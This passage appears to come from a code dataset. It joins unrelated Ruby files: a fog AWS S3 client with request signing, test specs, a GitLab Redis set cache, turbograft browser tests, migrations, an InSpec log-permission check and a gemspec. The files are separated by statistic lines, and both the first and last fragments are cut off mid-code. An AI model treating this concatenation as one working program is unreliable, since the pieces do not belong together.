@aws_access_key_id = options[:aws_access_key_id]
@aws_secret_access_key = options[:aws_secret_access_key]
@aws_session_token = options[:aws_session_token]
@aws_credentials_expire_at = options[:aws_credentials_expire_at]
@signer = Fog::AWS::SignatureV4.new( @aws_access_key_id, @aws_secret_access_key, @region, 's3')
end
def signature_v2(params, expires)
'foo'
end
end
class Real
include Utils
include Fog::AWS::CredentialFetcher::ConnectionMethods
# Initialize connection to S3
#
# ==== Notes
# options parameter must include values for :aws_access_key_id and
# :aws_secret_access_key in order to create a connection
#
# ==== Examples
# s3 = Fog::Storage.new(
# :provider => "AWS",
# :aws_access_key_id => your_aws_access_key_id,
# :aws_secret_access_key => your_aws_secret_access_key
# )
#
# ==== Parameters
# * options<~Hash> - config arguments for connection. Defaults to {}.
#
# ==== Returns
# * S3 object with connection to aws.
def initialize(options={})
@use_iam_profile = options[:use_iam_profile]
@instrumentor = options[:instrumentor]
@instrumentor_name = options[:instrumentor_name] || 'fog.aws.storage'
@connection_options = options[:connection_options] || {}
@persistent = options.fetch(:persistent, false)
@signature_version = options.fetch(:aws_signature_version, 4)
validate_signature_version!
@path_style = options[:path_style] || false
@region = options[:region] || DEFAULT_REGION
if @endpoint = options[:endpoint]
endpoint = URI.parse(@endpoint)
@host = endpoint.host
@scheme = endpoint.scheme
@port = endpoint.port
else
@host = options[:host] || region_to_host(@region)
@scheme = options[:scheme] || DEFAULT_SCHEME
@port = options[:port] || DEFAULT_SCHEME_PORT[@scheme]
end
setup_credentials(options)
end
def reload
@connection.reset if @connection
end
private
def setup_credentials(options)
@aws_access_key_id = options[:aws_access_key_id]
@aws_secret_access_key = options[:aws_secret_access_key]
@aws_session_token = options[:aws_session_token]
@aws_credentials_expire_at = options[:aws_credentials_expire_at]
if @signature_version == 4
@signer = Fog::AWS::SignatureV4.new( @aws_access_key_id, @aws_secret_access_key, @region, 's3')
elsif @signature_version == 2
@hmac = Fog::HMAC.new('sha1', @aws_secret_access_key)
end
end
def connection(scheme, host, port)
uri = "#{scheme}://#{host}:#{port}"
if @persistent
unless uri == @connection_uri
@connection_uri = uri
reload
@connection = nil
end
else
@connection = nil
end
@connection ||= Fog::XML::Connection.new(uri, @persistent, @connection_options)
end
def request(params, &block)
refresh_credentials_if_expired
date = Fog::Time.now
params = params.dup
stringify_query_keys(params)
params[:headers] = (params[:headers] || {}).dup
params[:headers]['x-amz-security-token'] = @aws_session_token if @aws_session_token
if @signature_version == 2
expires = date.to_date_header
params[:headers]['Date'] = expires
params[:headers]['Authorization'] = "AWS #{@aws_access_key_id}:#{signature_v2(params, expires)}"
end
params = request_params(params)
scheme = params.delete(:scheme)
host = params.delete(:host)
port = params.delete(:port) || DEFAULT_SCHEME_PORT[scheme]
params[:headers]['Host'] = host
if @signature_version == 4
params[:headers]['x-amz-date'] = date.to_iso8601_basic
if params[:body].respond_to?(:read)
# See http://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-streaming.html
# We ignore the bit about setting the content-encoding to aws-chunked because
# this can cause s3 to serve files with a blank content encoding which causes problems with some CDNs
# AWS have confirmed that s3 can infer that the content-encoding is aws-chunked from the x-amz-content-sha256 header
#
params[:headers]['x-amz-content-sha256'] = 'STREAMING-AWS4-HMAC-SHA256-PAYLOAD'
params[:headers]['x-amz-decoded-content-length'] = params[:headers].delete 'Content-Length'
else
params[:headers]['x-amz-content-sha256'] ||= Digest::SHA256.hexdigest(params[:body] || '')
end
signature_components = @signer.signature_components(params, date, params[:headers]['x-amz-content-sha256'])
params[:headers]['Authorization'] = @signer.components_to_header(signature_components)
if params[:body].respond_to?(:read)
body = params.delete :body
params[:request_block] = S3Streamer.new(body, signature_components['X-Amz-Signature'], @signer, date)
end
end
# FIXME: ToHashParser should make this not needed
original_params = params.dup
if @instrumentor
@instrumentor.instrument("#{@instrumentor_name}.request", params) do
_request(scheme, host, port, params, original_params, &block)
end
else
_request(scheme, host, port, params, original_params, &block)
end
end
def _request(scheme, host, port, params, original_params, &block)
connection(scheme, host, port).request(params, &block)
rescue Excon::Errors::MovedPermanently, Excon::Errors::TemporaryRedirect => error
headers = (error.response.is_a?(Hash) ? error.response[:headers] : error.response.headers)
new_params = {}
if headers.has_key?('Location')
new_params[:host] = URI.parse(headers['Location']).host
else
body = error.response.is_a?(Hash) ? error.response[:body] : error.response.body
# some errors provide info indirectly
new_params[:bucket_name] = %r{<Bucket>([^<]*)</Bucket>}.match(body).captures.first
new_params[:host] = %r{<Endpoint>([^<]*)</Endpoint>}.match(body).captures.first
# some errors provide it directly
@new_region = %r{<Region>([^<]*)</Region>}.match(body) ? Regexp.last_match.captures.first : nil
end
Fog::Logger.warning("fog: followed redirect to #{host}, connecting to the matching region will be more performant")
original_region, original_signer = @region, @signer
@region = @new_region || case new_params[:host]
when /s3.amazonaws.com/, /s3-external-1.amazonaws.com/
DEFAULT_REGION
else
%r{s3[\.\-]([^\.]*).amazonaws.com}.match(new_params[:host]).captures.first
end
if @signature_version == 4
@signer = Fog::AWS::SignatureV4.new(@aws_access_key_id, @aws_secret_access_key, @region, 's3')
original_params[:headers].delete('Authorization')
end
response = request(original_params.merge(new_params), &block)
@region, @signer = original_region, original_signer
response
end
# See http://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-streaming.html
class S3Streamer
attr_accessor :body, :signature, :signer, :finished, :date, :initial_signature
def initialize(body, signature, signer, date)
self.body = body
self.date = date
self.signature = signature
self.initial_signature = signature
self.signer = signer
if body.respond_to?(:binmode)
body.binmode
end
if body.respond_to?(:pos=)
body.pos = 0
end
end
#called if excon wants to retry the request. As well as rewinding the body
#we must also reset the signature
def rewind
self.signature = initial_signature
body.rewind
end
def call
if finished
''
else
next_chunk
end
end
def next_chunk
data = body.read(0x10000)
if data.nil?
self.finished = true
data = ''
end
self.signature = sign_chunk(data, signature)
"#{data.length.to_s(16)};chunk-signature=#{signature}\r\n#{data}\r\n"
end
def sign_chunk(data, previous_signature)
string_to_sign = <<-DATA
AWS4-HMAC-SHA256-PAYLOAD
#{date.to_iso8601_basic}
#{signer.credential_scope(date)}
#{previous_signature}
#{Digest::SHA256.hexdigest('')}
#{Digest::SHA256.hexdigest(data)}
DATA
hmac = signer.derived_hmac(date)
hmac.sign(string_to_sign.strip).unpack('H*').first
end
end
def signature_v2(params, expires)
headers = params[:headers] || {}
string_to_sign =
<<-DATA
#{params[:method].to_s.upcase}
#{headers['Content-MD5']}
#{headers['Content-Type']}
#{expires}
DATA
amz_headers, canonical_amz_headers = {}, ''
for key, value in headers
if key[0..5] == 'x-amz-'
amz_headers[key] = value
end
end
amz_headers = amz_headers.sort {|x, y| x[0] <=> y[0]}
for key, value in amz_headers
canonical_amz_headers << "#{key}:#{value}\n"
end
string_to_sign << canonical_amz_headers
query_string = ''
if params[:query]
query_args = []
for key in params[:query].keys.sort
if VALID_QUERY_KEYS.include?(key)
value = params[:query][key]
if value
query_args << "#{key}=#{value}"
else
query_args << key
end
end
end
if query_args.any?
query_string = '?' + query_args.join('&')
end
end
canonical_path = (params[:path] || object_to_path(params[:object_name])).to_s
canonical_path = '/' + canonical_path if canonical_path[0..0] != '/'
if params[:bucket_name]
canonical_resource = "/#{params[:bucket_name]}#{canonical_path}"
else
canonical_resource = canonical_path
end
canonical_resource << query_string
string_to_sign << canonical_resource
signed_string = @hmac.sign(string_to_sign)
Base64.encode64(signed_string).chomp!
end
def stringify_query_keys(params)
params[:query] = Hash[params[:query].map { |k,v| [k.to_s, v] }] if params[:query]
end
end
end
end
end
| 34.613423 | 303 | 0.556327 |
abe3b57a5fc729a59f1cdc14f07413f34b296c1f | 82 | exclude :test_update, 'Precision is off'
exclude :test_values, 'Precision is off'
| 27.333333 | 40 | 0.780488 |
87a14e8367908e58723ea90b12396bcc89d08550 | 1,922 | require "minitest/spec"
require "minitest/autorun"
require 'mocha/minitest'
require "./src/user_config/provider"
describe "UserConfig" do
describe "Provider" do
let(:user_config) {{"credentials"=>{}}}
let(:provider) { UserConfig::Provider.new(user_config) }
it "should create provider" do
provider.wont_be_nil
end
describe "newrelic" do
let(:new_relic_license_key) {"abcdef"}
let(:new_relic_collector_url) {"http://collector.newrelic.com"}
let(:user_config) {{ "credentials"=>{"newrelic"=>{"licenseKey"=>new_relic_license_key, "urls"=>{"collector"=>new_relic_collector_url} }} }}
it "should return newrelic credential license key" do
credential = provider.get_credential("newrelic")
credential.wont_be_nil()
credential.get_license_key().must_equal(new_relic_license_key)
end
it "should return newrelic credential collector url" do
credential = provider.get_credential("newrelic")
credential.wont_be_nil()
credential.get_collector_url().must_equal(new_relic_collector_url)
end
end
describe "aws" do
let(:aws_access_key) {"fddsffdfg"}
let(:user_config) {{ "credentials"=>{"aws"=>{"apiKey"=>aws_access_key }} }}
it "should return aws credential api key" do
credential = provider.get_aws_credential()
credential.wont_be_nil()
credential.get_access_key().must_equal(aws_access_key)
end
end
describe "git" do
let(:my_personal_access_token) { "my access token"}
let(:user_config) {{ "credentials"=>{"git"=>{"myusername"=>my_personal_access_token}} }}
it "should return git credential" do
credential = provider.get_git_credentials()
credential.wont_be_nil()
credential.get_personal_access_token("myusername").must_equal(my_personal_access_token)
end
end
end
end
| 33.137931 | 145 | 0.67794 |
f73ac628bce539eef2518ef953ee41973651ca17 | 1,814 | # frozen_string_literal: true
# Interface to the Redis-backed cache store for keys that use a Redis set
module Gitlab
class RepositorySetCache < Gitlab::SetCache
attr_reader :repository, :namespace, :expires_in
def initialize(repository, extra_namespace: nil, expires_in: 2.weeks)
@repository = repository
@namespace = "#{repository.full_path}"
@namespace += ":#{repository.project.id}" if repository.project
@namespace = "#{@namespace}:#{extra_namespace}" if extra_namespace
@expires_in = expires_in
end
def cache_key(type)
"#{type}:#{namespace}:set"
end
def write(key, value)
full_key = cache_key(key)
with do |redis|
redis.multi do
redis.unlink(full_key)
# Splitting into groups of 1000 prevents us from creating a too-long
# Redis command
value.each_slice(1000) { |subset| redis.sadd(full_key, subset) }
redis.expire(full_key, expires_in)
end
end
value
end
def fetch(key, &block)
full_key = cache_key(key)
smembers, exists = with do |redis|
redis.multi do
redis.smembers(full_key)
redis.exists(full_key)
end
end
return smembers if exists
write(key, yield)
end
# Searches the cache set using SSCAN with the MATCH option. The MATCH
# parameter is the pattern argument.
# See https://redis.io/commands/scan#the-match-option for more information.
# Returns an Enumerator that enumerates all SSCAN hits.
def search(key, pattern, &block)
full_key = cache_key(key)
with do |redis|
exists = redis.exists(full_key)
write(key, yield) unless exists
redis.sscan_each(full_key, match: pattern)
end
end
end
end
| 26.289855 | 79 | 0.642227 |
269dc2195300fd73fe6dd735745158a058dcb13e | 3,797 | require 'test_helper'
require 'benchmark'
class FullPageRefreshTest < ActionDispatch::IntegrationTest
include Capybara::DSL
setup do
visit "/pages/1"
end
test "will strip noscript tags" do
click_link "Perform a full navigation to learn more"
refute page.has_selector?("noscript") # this test should pass, I think
refute page.has_content?("Please enable JavaScript")
end
test "will replace the title and body" do
page.execute_script "document.title = 'Something';"
page.execute_script "$('body').addClass('hot-new-bod');"
click_link "Perform a full navigation to learn more"
page.assert_no_selector('body.hot-new-bod')
assert_not_equal "Something", page.title
end
test "will execute scripts that do not have data-turbolinks-eval='false'" do
click_link "Perform a full navigation to learn more"
assert page.has_selector?("div.eval-true")
end
test "will not execute scripts that have data-turbolinks-eval='false'" do
click_link "Perform a full navigation to learn more"
refute page.has_selector?("div.eval-false")
end
test "will not keep any data-tg-refresh-never nodes around" do
assert page.has_selector?("[data-tg-refresh-never]")
click_link "next"
refute page.has_selector?("[data-tg-refresh-never]")
end
test "going to a URL that will error 500, and hitting the browser back button, we see the correct page (and not the 500)" do
click_link "I will throw an error 500"
has_text = false
while !has_text
has_text = page.assert_text('Error 500!')
sleep 1
end
assert_not_equal "Sample Turbograft Application", page.title
page.execute_script 'window.history.back()'
page.assert_no_text('Error 500!')
assert_equal "Sample Turbograft Application", page.title
end
test "going to a URL that will error 404, and hitting the browser back button, we see the correct page (and not the 404)" do
click_link "I will throw an error 404"
has_text = false
while !has_text
has_text = page.assert_text('Error 404!')
sleep 1
end
assert_not_equal "Sample Turbograft Application", page.title
page.execute_script 'window.history.back()'
page.assert_no_text('Error 404!')
assert_equal "Sample Turbograft Application", page.title
end
test "data-tg-static preserves client-side state of innards on full refresh, but will replaces contents if we specifically data-tg-partially-refresh a section inside of it" do
page.fill_in 'badgeinput', :with => 'data-tg-static innards'
click_link "Perform a full page refresh"
assert_equal "data-tg-static innards", find_field("badgeinput").value
click_link "Perform a partial page refresh and refresh the navigation section"
while !page.has_content?
sleep 500
end
assert_equal "", find_field("badgeinput").value
end
test "data-tg-refresh-always will always refresh the annotated nodes, regardless of refresh type" do
page.fill_in 'badgeinput2', :with => 'some innards 523'
click_link "Perform a full page refresh"
page.assert_no_text "some innards 523"
assert_equal "", find_field("badgeinput2").value
page.fill_in 'badgeinput2', :with => 'some innards 555'
click_link "Perform a partial page refresh and refresh the navigation section"
page.assert_no_text "some innards 555"
assert_equal "", find_field("badgeinput2").value
end
test "data-tg-refresh-always will not destroy or remove the node on a full page refresh" do
assert page.has_content?('data-tg-refresh-always outside of data-tg-static')
assert page.has_content?("You're on page 1")
click_link 'next'
assert page.has_content?("You're on page 2")
assert page.has_content?('data-tg-refresh-always outside of data-tg-static')
end
end
| 39.14433 | 177 | 0.724256 |
ff67704b4fd39fe1fd88a6e6aa218a0aed362a31 | 716 | class CreateAccounts < ActiveRecord::Migration[4.2]
def change
create_table :accounts do |t|
t.string :encrypted_bic, null: false
t.string :encrypted_owner, null: true
t.string :encrypted_iban, null: false
t.string :encrypted_bank, null: false
t.string :encrypted_name, null: true
t.string :encrypted_bic_salt
t.string :encrypted_owner_salt
t.string :encrypted_iban_salt
t.string :encrypted_bank_salt
t.string :encrypted_name_salt
t.string :encrypted_bic_iv
t.string :encrypted_owner_iv
t.string :encrypted_iban_iv
t.string :encrypted_bank_iv
t.string :encrypted_name_iv
t.timestamps null: false
end
end
end
| 31.130435 | 51 | 0.699721 |
616d62fb0b85259c5f64fa54ccaced4d827f39ad | 247 | class CreateClickLogs < ActiveRecord::Migration
def change
create_table :click_logs do |t|
t.references :user, index: true
t.integer :ref_id
t.string :ref_clazz
t.string :ref_url
t.timestamps
end
end
end
| 19 | 47 | 0.659919 |
f7ee49c7e01f3b326ba577f1fee33a24aa489372 | 1,446 | control "VCST-67-000007" do
title "Security Token Service log files must only be modifiable by privileged
users."
desc "Log data is essential in the investigation of events. The accuracy of
the information is always pertinent. One of the first steps an attacker will
undertake is the modification or deletion of log records to cover his tracks
and prolong discovery. The web server must protect the log data from
unauthorized modification. Security Token Service restricts all modification of
log files by default but this configuration must be verified."
impact 0.5
tag severity: "CAT II"
tag gtitle: "SRG-APP-000119-WSR-000069"
tag gid: nil
tag rid: "VCST-67-000007"
tag stig_id: "VCST-67-000007"
tag cci: "CCI-000163"
tag nist: ["AU-9", "Rev_4"]
desc 'check', "At the command prompt, execute the following command:
# find /storage/log/vmware/sso/ -xdev -type f -a '(' -perm -o+w -o -not -user
root -o -not -group root ')' -exec ls -ld {} \\;
If any files are returned, this is a finding."
desc 'fix', "At the command prompt, execute the following commands:
# chmod o-w <file>
# chown root:root <file>
Note: Subsitute <file> with the listed file."
command('find /storage/log/vmware/sso/ -type f -xdev').stdout.split.each do | fname |
describe file(fname) do
it { should_not be_more_permissive_than('0644') }
its('owner') {should eq 'root'}
its('group') {should eq 'root'}
end
end
end | 37.076923 | 87 | 0.713001 |
d5618ca4d9650d92a09bd8810c30ffc8b88a712c | 231 | RSpec::Matchers.define :have_filters do |kind, *names|
match do |controller|
filters = controller._process_action_callbacks.select{ |f| f.kind == kind }.map(&:filter)
names.all?{ |name| filters.include?(name) }
end
end
| 33 | 93 | 0.701299 |
1a28e5a09bc9436b21ceb0b41dd6e3618c98358e | 1,949 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20150504124753) do
create_table "bikes", force: true do |t|
t.string "nickname"
t.text "memo"
t.datetime "created_at"
t.datetime "updated_at"
t.string "typename"
end
create_table "itemhistories", force: true do |t|
t.integer "item_id"
t.datetime "start_date"
t.datetime "end_date"
t.decimal "distance", precision: 8, scale: 3
t.text "memo"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "itemhistories", ["item_id"], name: "index_itemhistories_on_item_id"
create_table "items", force: true do |t|
t.integer "itemtype_id"
t.string "nickname"
t.decimal "distance", precision: 8, scale: 3
t.text "memo"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "items", ["itemtype_id"], name: "index_items_on_itemtype_id"
create_table "itemtypes", force: true do |t|
t.string "name"
t.decimal "limitdistance", precision: 8, scale: 3
t.text "memo"
t.datetime "created_at"
t.datetime "updated_at"
t.integer "bike_id"
end
add_index "itemtypes", ["bike_id"], name: "index_itemtypes_on_bike_id"
end
| 33.033898 | 86 | 0.707029 |
1a86f4d1c3116d72fd06aaea7c48f0a274b0be62 | 801 |
Pod::Spec.new do |spec|
spec.name = "RZEventKit"
spec.version = "3.0.2"
spec.summary = "Small example to test code sharing."
spec.description = "Small example to test code sharing via cocoapods."
spec.homepage = "https://github.com/nersonSwift/RelizKit"
spec.license = "MIT"
spec.author = {
"Angel-senpai" => "[email protected]",
"nersonSwift" => "[email protected]"
}
spec.source = {
:git => "https://github.com/nersonSwift/RelizSDK.git",
:tag => spec.name.to_s + "_v" + spec.version.to_s
}
spec.source_files = "Sources/RZEventKit/**/*"
spec.exclude_files = "Sources/RZEventKit/**/*.plist"
spec.swift_version = '5.3'
spec.ios.deployment_target = '13.0'
spec.requires_arc = true
end
| 22.25 | 74 | 0.627965 |
01a4d3a07bc145eaffc83fdbc7edd3f130497c6e | 7,774 | =begin
#NSX-T Data Center Policy API
#VMware NSX-T Data Center Policy REST API
OpenAPI spec version: 3.1.0.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'date'
module NSXTPolicy
# Paginated collection of members belonging to a Group.
class PolicyGroupMembersListResult
# Link to this resource
attr_accessor :_self
# The server will populate this field when returing the resource. Ignored on PUT and POST.
attr_accessor :_links
# Schema for this resource
attr_accessor :_schema
# Opaque cursor to be used for getting next page of records (supplied by current result page)
attr_accessor :cursor
# If true, results are sorted in ascending order
attr_accessor :sort_ascending
# Field by which records are sorted
attr_accessor :sort_by
# Count of results found (across all pages), set only on first page
attr_accessor :result_count
# Paged Collection of members that belong to the given Group
attr_accessor :results
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'_self' => :'_self',
:'_links' => :'_links',
:'_schema' => :'_schema',
:'cursor' => :'cursor',
:'sort_ascending' => :'sort_ascending',
:'sort_by' => :'sort_by',
:'result_count' => :'result_count',
:'results' => :'results'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'_self' => :'SelfResourceLink',
:'_links' => :'Array<ResourceLink>',
:'_schema' => :'String',
:'cursor' => :'String',
:'sort_ascending' => :'BOOLEAN',
:'sort_by' => :'String',
:'result_count' => :'Integer',
:'results' => :'Array<PolicyGroupMemberDetails>'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'_self')
self._self = attributes[:'_self']
end
if attributes.has_key?(:'_links')
if (value = attributes[:'_links']).is_a?(Array)
self._links = value
end
end
if attributes.has_key?(:'_schema')
self._schema = attributes[:'_schema']
end
if attributes.has_key?(:'cursor')
self.cursor = attributes[:'cursor']
end
if attributes.has_key?(:'sort_ascending')
self.sort_ascending = attributes[:'sort_ascending']
end
if attributes.has_key?(:'sort_by')
self.sort_by = attributes[:'sort_by']
end
if attributes.has_key?(:'result_count')
self.result_count = attributes[:'result_count']
end
if attributes.has_key?(:'results')
if (value = attributes[:'results']).is_a?(Array)
self.results = value
end
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @results.nil?
invalid_properties.push('invalid value for "results", results cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @results.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
_self == o._self &&
_links == o._links &&
_schema == o._schema &&
cursor == o.cursor &&
sort_ascending == o.sort_ascending &&
sort_by == o.sort_by &&
result_count == o.result_count &&
results == o.results
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[_self, _links, _schema, cursor, sort_ascending, sort_by, result_count, results].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = NSXTPolicy.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.225564 | 107 | 0.611011 |
28c3c2441ebb24e7385cb922d7dc0b363ee891b5 | 962 | class Templates < Attachments
@@template_types = ["section", "single", "archive", "search", "error", "tag", "layout"]
@@template_types.sort!
def template_types(extension = ".liquid")
@@template_types.collect { |f| "#{f}"+extension }
end
def [](template_name)
template_name = File.basename(template_name.to_s).sub /#{theme.extension}$/, ''
theme.path + "#{template_name =~ /layout$/ ? 'layouts' : 'templates'}/#{template_name}#{theme.extension}"
end
def collect_templates(template_type, *custom_templates)
custom_templates.push(template_type.to_s+theme.extension).collect! { |t| self[t] }
end
# adds the custom_template to the top of the hierarchy if given
def find_preferred(template_type, custom_template = nil)
collect_templates(template_type, custom_template).detect(&:file?)
end
def custom(extension = ".liquid")
@custom ||= (collect { |p| p.basename.to_s } - template_types(extension)).sort
end
end | 37 | 109 | 0.696466 |
1cd12219aeedfb8921126d9c19767df22ac51b44 | 1,121 | require "faraday"
module Applicaster
module Ais
class Request
attr_accessor :config
def self.get(path, params = {})
new.get(path, params)
end
def self.post(path, params = {})
new.post(path, params)
end
def self.put(path, params)
new.put(path,params)
end
def get(path, params = {})
connection.get path, complete_params(params)
end
def post(path, params = {})
connection.post path, complete_params(params)
end
def put(path, params = {})
connection.put path, complete_params(params)
end
private
def connection
@connection ||= Faraday.new(url: config.host) do |connection|
connection.request :json
connection.adapter Faraday.default_adapter
end
end
def complete_params(params = {})
return params if params.has_key?(:access_token)
params.merge(access_token: access_token)
end
def access_token
config.access_token
end
def config
Ais.config
end
end
end
end
| 20.381818 | 69 | 0.589652 |
1d664e690811582a86e9215d5bf9c056916e7f6a | 1,893 | # -*- encoding: utf-8 -*-
# frozen_string_literal: true
$LOAD_PATH.push File.expand_path('../lib', __FILE__)
require 'devise-security/version'
Gem::Specification.new do |s|
s.name = 'devise-security'
s.version = DeviseSecurity::VERSION.dup
s.platform = Gem::Platform::RUBY
s.licenses = ['MIT']
s.summary = 'Security extension for devise'
s.email = '[email protected]'
s.homepage = 'https://github.com/devise-security/devise-security'
s.description = 'An enterprise security extension for devise.'
s.authors = [
'Marco Scholl',
'Alexander Dreher',
'Nate Bird',
'Dillon Welch',
'Kevin Olbrich'
]
s.post_install_message = 'WARNING: devise-security will drop support for Rails 4.2 in version 0.16.0'
s.files = Dir['README.md', 'LICENSE.txt', 'lib/**/*', 'app/**/*', 'config/**/*']
s.test_files = Dir['test/**/*']
s.require_paths = ['lib']
s.required_ruby_version = '>= 2.3.0'
s.add_runtime_dependency 'devise', '>= 4.3.0', '< 5.0'
s.add_development_dependency 'appraisal'
s.add_development_dependency 'bundler'
s.add_development_dependency 'database_cleaner'
s.add_development_dependency 'database_cleaner-mongoid'
s.add_development_dependency 'easy_captcha'
s.add_development_dependency 'm'
s.add_development_dependency 'minitest'
s.add_development_dependency 'omniauth', '< 2.0.0'
s.add_development_dependency 'pry-byebug'
s.add_development_dependency 'pry-rescue'
s.add_development_dependency 'rails_email_validator'
s.add_development_dependency 'rubocop', '~> 0.80.0' # NOTE: also update .codeclimate.yml and make sure it uses the same version
s.add_development_dependency 'rubocop-rails'
s.add_development_dependency 'simplecov-lcov'
s.add_development_dependency 'solargraph'
s.add_development_dependency 'sqlite3'
s.add_development_dependency 'wwtd'
end
| 37.86 | 129 | 0.71421 |
bfc9f646ff460b95689d127254b385a4b8c7778a | 139 | module AppleNewsClient
module Behavior
class Parallax < Base
type "parallax"
optional_property :factor
end
end
end
| 15.444444 | 31 | 0.690647 |
91ef4e72eb74bd00d1105242503441e26c21cc8d | 1,100 | class Fio < Formula
desc "I/O benchmark and stress test"
homepage "https://github.com/axboe/fio"
url "https://github.com/axboe/fio/archive/fio-3.8.tar.gz"
sha256 "3eccc9eb2ccf9d910ab391c5d639565e0f6bb4050620d161f26c36c6ff83454f"
bottle do
cellar :any_skip_relocation
# sha256 "39a042775bc8e7f84c18cf714080ca0b70768625f41dc085a6ceb1c116a2875e" => :mojave
sha256 "0fddb60bfc65a89bce2b7f9a0226e8f792302c29bd3c18684e28a943c13bd6af" => :high_sierra
sha256 "528b4c5cde0ef580ad4dc192b54588c9c5302f48d4ef84bf7c3063a2eb50761c" => :sierra
sha256 "2474d07db0d530e110500dbc7d64e7b43cbb527b9c0d42b439b551fe6779b3bf" => :el_capitan
end
def install
system "./configure"
# fio's CFLAGS passes vital stuff around, and crushing it will break the build
system "make", "prefix=#{prefix}",
"mandir=#{man}",
"sharedir=#{share}",
"CC=#{ENV.cc}",
"V=true", # get normal verbose output from fio's makefile
"install"
end
test do
system "#{bin}/fio", "--parse-only"
end
end
| 36.666667 | 93 | 0.689091 |
bfb0d3f5dc6dfc6f6d5b3af90c954d64c513571c | 1,202 | # frozen_string_literal: true
# encoding: utf-8
# Copyright (C) 2021 MongoDB Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Mongo
module Operation
class WriteCommand
# A MongoDB write command operation sent as an op message.
#
# @api private
class OpMsg < OpMsgBase
include Validatable
private
def selector(connection)
super.tap do |selector|
if selector.key?(:findAndModify)
validate_find_options(connection, selector)
end
if wc = spec[:write_concern]
selector[:writeConcern] = wc.options
end
end
end
end
end
end
end
| 27.318182 | 74 | 0.663894 |
26dfa66488bd9db1398b955293137f2331e8e480 | 142 | require 'mxx_ru/cpp'
MxxRu::Cpp::exe_target {
required_prj 'so_5/prj_s.rb'
target 'sample.so_5.coop_listener_s'
cpp_source 'main.cpp'
}
| 14.2 | 37 | 0.739437 |
21fed918e6f20ae2efb41755b51b059b1f39c555 | 686 | require 'active_support/inflector'
class Dessert
attr_reader :type, :quantity, :ingredients, :temp
def initialize(type, quantity, chef)
raise ArgumentError unless quantity.is_a?(Integer)
@type = type
@quantity = quantity
@chef = chef
@ingredients = []
@temp = 60
end
def add_ingredient(ingredient)
@ingredients << ingredient
end
def mix!
@ingredients.shuffle!
end
def heat!
@temp = 400
end
def eat(amount)
raise "not enough left!" if @quantity - amount < 0
@quantity -= amount
end
def serve
